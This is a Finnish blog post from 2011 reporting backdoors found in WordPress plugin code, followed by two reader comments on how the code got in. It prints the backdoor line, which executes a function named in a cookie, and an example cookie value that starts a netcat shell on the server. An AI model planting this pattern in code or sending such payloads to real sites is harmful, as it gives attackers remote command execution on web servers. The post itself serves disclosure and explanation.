Ads 468x60px

keskiviikko 22. kesäkuuta 2011

Takaovia WordPress-blogialustassa

WordPress on julkaissut tiedonannon, jonka mukaan heidän plugin-koodia sisältävästä lähdekoodirepositorystaan on löytynyt useita takaovia ("backdoor"). Hakkerit voivat käyttää takaovia tunkeutuakseen järjestelmiin, jotka käyttävät WordPressia blogialustanaan.

WordPress on blogien luomiseen ja hallinnointiin tarkoitettu avoimen lähdekoodin sisällönhallintaohjelmisto, joka on toteutettu PHP:llä.

Yksi esimerkki takaovesta löytyy WordPressin versionhallinnasta oheisen linkin takaa:

Itse takaovi piilee tässä koodirivissä:

if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))

Käytännössä yo. takaovea voi käyttää hyväkseen lähettämällä WordPressille evästeen "key", jonka arvoksi on asetettu esim:

#useragent/exec/nc -lp 6667 -e /bin/bash/#

Tämä avaa kohdepalvelimelle netcat-kuuntelijan porttiin 6667. Netcat käynnistää komentokehoteen palvelimelle, kun hyökkääjä ottaa yhteyden ko. porttiin esim. telnetillä. Tämän jälkeen hyökkääjä voi suorittaa palvelimella komentoja web-palvelimen oikeuksin.

WordPress on joutunut vastaavanlaisen hyökkäyksen kohteeksi myös aiemmin tänä vuonna.

Lähde:

2 kommenttia:

Mika Iivari kirjoitti...

Onko tietoa mikä taho nämä takaovet on ujuttanut plugineihin? Yleensä muutoshallinta, kehitystyö, testaus ja tuotantoonvienti ovat tarkasti säänneltyjä ja tehtävät eriytettyjä juuri sen vuoksi, että haitallista tai testaamatonta koodia ei pääse tuotantoympäristöihin. Ne eivät ole vain auditoijia varten piirrettyjä vuokaavioita :)

Antti Alestalo kirjoitti...

Jaa-a, oisko devaajien pöllityt tilit? Nuo kolme komponenttia, joissa takaovet olivat, ovat kai jotain plugineja.

WP on avoimen lähdekoodin kikkare, joten siellä ei hirveästi ole kaavioita piirrelty. Prosessi kuitenkin toiminee, kun takaovet huomattiin noin päivässä.

Lähetä kommentti